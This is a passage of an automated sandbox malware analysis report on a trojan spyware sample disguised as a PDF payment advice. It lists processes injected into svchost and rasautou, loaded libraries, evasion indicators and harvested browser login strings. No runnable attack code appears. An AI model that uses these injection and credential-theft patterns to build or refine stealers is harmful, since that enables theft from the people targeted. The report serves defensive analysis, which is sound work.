                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049A5AA0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A0DAC6
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A17A46
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A1FA49
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049D3A6C
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0497FB80
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0499DBF9
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_049D5BF0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_04A1FB76
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_02A522F0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_02A6C140
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_02A4D3E0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_02A4D1C0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_02A4B460
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_02A53BAC
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_02A53BB0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_02A559B0
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0483E428
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0483E543
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0483E8DC
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_0483D9A8
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03887E54 appears 111 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0382B970 appears 277 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 038AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 038BF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03875130 appears 58 times
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: String function: 00860AE3 appears 70 times
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: String function: 00868900 appears 42 times
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: String function: 00847DE1 appears 36 times
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: String function: 04995130 appears 58 times
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: String function: 049DF290 appears 105 times
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: String function: 0494B970 appears 277 times
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: String function: 049A7E54 appears 103 times
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: String function: 049CEA12 appears 86 times
                Source: rPaymentAdviceNote_pdf.exe, 00000000.00000003.1279049819.0000000004113000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs rPaymentAdviceNote_pdf.exe
                Source: rPaymentAdviceNote_pdf.exe, 00000000.00000003.1281026249.000000000430D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs rPaymentAdviceNote_pdf.exe
                Source: rPaymentAdviceNote_pdf.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@10/8
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008AA06A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008981CB AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008987E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008AB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008BEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008AC397 CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_00844E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | File created: C:\Users\user~1\AppData\Local\Temp\autA4FA.tmp
                Source: rPaymentAdviceNote_pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: rasautou.exe, 0000000B.00000002.3091557163.0000000002D67000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1641099513.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1641158815.0000000002D33000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3091557163.0000000002D33000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: rPaymentAdviceNote_pdf.exe | ReversingLabs: Detection: 34%
                Source: unknown | Process created: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe"
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe"
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Process created: C:\Windows\SysWOW64\rasautou.exe "C:\Windows\SysWOW64\rasautou.exe"
                Source: C:\Windows\SysWOW64\rasautou.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: rasdlg.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: rasman.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: mprapi.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\rasautou.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\rasautou.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: rPaymentAdviceNote_pdf.exe | Static file information: File size 1226752 > 1048576
                Source: rPaymentAdviceNote_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: rPaymentAdviceNote_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: rPaymentAdviceNote_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: rPaymentAdviceNote_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: rPaymentAdviceNote_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: rPaymentAdviceNote_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: rPaymentAdviceNote_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lDBisuvfBkK.exe, 0000000A.00000002.3091104280.0000000000BCE000.00000002.00000001.01000000.00000005.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3093155257.0000000000BCE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: rPaymentAdviceNote_pdf.exe, 00000000.00000003.1279362794.0000000004190000.00000004.00001000.00020000.00000000.sdmp, rPaymentAdviceNote_pdf.exe, 00000000.00000003.1280888739.0000000004040000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1446460401.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1352518601.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1446460401.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1354325198.0000000003600000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1452661667.0000000004777000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3093982408.0000000004920000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3093982408.0000000004ABE000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1450087582.00000000045C1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: rPaymentAdviceNote_pdf.exe, 00000000.00000003.1279362794.0000000004190000.00000004.00001000.00020000.00000000.sdmp, rPaymentAdviceNote_pdf.exe, 00000000.00000003.1280888739.0000000004040000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.1446460401.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1352518601.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1446460401.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1354325198.0000000003600000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, rasautou.exe, 0000000B.00000003.1452661667.0000000004777000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3093982408.0000000004920000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3093982408.0000000004ABE000.00000040.00001000.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1450087582.00000000045C1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CB7000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3095003763.0000000004F4C000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000000.1520703069.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1747520200.000000000C7EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CB7000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3095003763.0000000004F4C000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000000.1520703069.0000000002BFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1747520200.000000000C7EC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: rasautou.pdbGCTL source: svchost.exe, 00000008.00000002.1446198845.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1411118102.0000000003213000.00000004.00000020.00020000.00000000.sdmp, lDBisuvfBkK.exe, 0000000A.00000003.1381282977.000000000107B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: rasautou.pdb source: svchost.exe, 00000008.00000002.1446198845.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1411118102.0000000003213000.00000004.00000020.00020000.00000000.sdmp, lDBisuvfBkK.exe, 0000000A.00000003.1381282977.000000000107B000.00000004.00000020.00020000.00000000.sdmp
                Source: rPaymentAdviceNote_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: rPaymentAdviceNote_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: rPaymentAdviceNote_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: rPaymentAdviceNote_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: rPaymentAdviceNote_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_00844B37 LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_00868945 push ecx; ret 0_2_00868958
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00414118 push ebx; retf 8_2_0041412D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00414123 push ebx; retf 8_2_0041412D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004051D4 push ebx; retf 8_2_004051E0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004151AD push edx; ret 8_2_004151AE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00412A2B pushfd ; iretd 8_2_00412A2C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004032E0 push eax; ret 8_2_004032E2
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00418A96 push edi; ret 8_2_00418A97
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040DB8C push esi; iretd 8_2_0040DB8D
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004013B0 push eax; ret 8_2_004014F1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004013B0 push edx; ret 8_2_00401734
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004193BE push esp; retf 8_2_004193BF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040D415 push cs; ret 8_2_0040D42F
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004014C2 push eax; ret 8_2_004014F1
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00414CE7 push ds; iretd 8_2_00414CCC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00414CAD push ds; iretd 8_2_00414CCC
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040852B pushfd ; ret 8_2_00408534
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00401725 push edx; ret 8_2_00401734
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00417F37 push ebp; ret 8_2_00417F38
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004087BB push FFFFFFBBh; retf 8_2_004087BE
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0380225F pushad ; ret 8_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038027FA pushad ; ret 8_2_038027F9
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_038309AD push ecx; mov dword ptr [esp], ecx 8_2_038309B6
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0380283D push eax; iretd 8_2_03802858
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_03801368 push eax; iretd 8_2_03801369
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Code function: 10_2_043644C3 push esi; ret 10_2_043644CD
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Code function: 10_2_043615A9 push ebp; ret 10_2_043615AA
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Code function: 10_2_04351E2D push FFFFFFBBh; retf 10_2_04351E30
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe | Code function: 10_2_04362E06 pushfd ; ret 10_2_04362E1B
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeCode function: 10_2_0435D795 push ebx; retf 10_2_0435D79F
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exeCode function: 10_2_0435D78A push ebx; retf 10_2_0435D79F
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008448D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_008448D7
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008C5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_008C5376
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_00863187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00863187
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\rasautou.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | API/Special instruction interceptor: Address: 16561A4
                Source: C:\Windows\SysWOW64\rasautou.exe | API/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\rasautou.exe | API/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\rasautou.exe | API/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\rasautou.exe | API/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\rasautou.exe | API/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\rasautou.exe | API/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\rasautou.exe | API/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\rasautou.exe | API/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0387096E rdtsc 8_2_0387096E
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | API coverage: 4.6 %
                Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\rasautou.exe | API coverage: 2.7 %
                Source: C:\Windows\SysWOW64\rasautou.exe TID: 180 | Thread sleep count: 44 > 30
                Source: C:\Windows\SysWOW64\rasautou.exe TID: 180 | Thread sleep time: -88000s >= -30000s
                Source: C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe TID: 1912 | Thread sleep time: -45000s >= -30000s
                Source: C:\Windows\SysWOW64\rasautou.exe | Last function: Thread delayed
                Source: C:\Windows\SysWOW64\rasautou.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008A445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_008A445A
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008AC6D1 FindFirstFileW,FindClose, 0_2_008AC6D1
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008AC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_008AC75C
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008AEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_008AEF95
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008AF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_008AF0F2
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008AF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_008AF3F3
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008A37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_008A37EF
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008A3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_008A3B12
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008ABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_008ABCBC
                Source: C:\Windows\SysWOW64\rasautou.exe | Code function: 11_2_02A5CC00 FindFirstFileW,FindNextFileW,FindClose, 11_2_02A5CC00
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exe | Code function: 0_2_008449A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_008449A0
                Source: firefox.exe, 0000000F.00000002.1748920713.000002AD8C7BC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK^
                Source: 3q3Zl7JL.11.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 3q3Zl7JL.11.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 3q3Zl7JL.11.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 3q3Zl7JL.11.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 3q3Zl7JL.11.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 3q3Zl7JL.11.dr | Binary or memory string: outlook.office.comVMware20,11696492231s
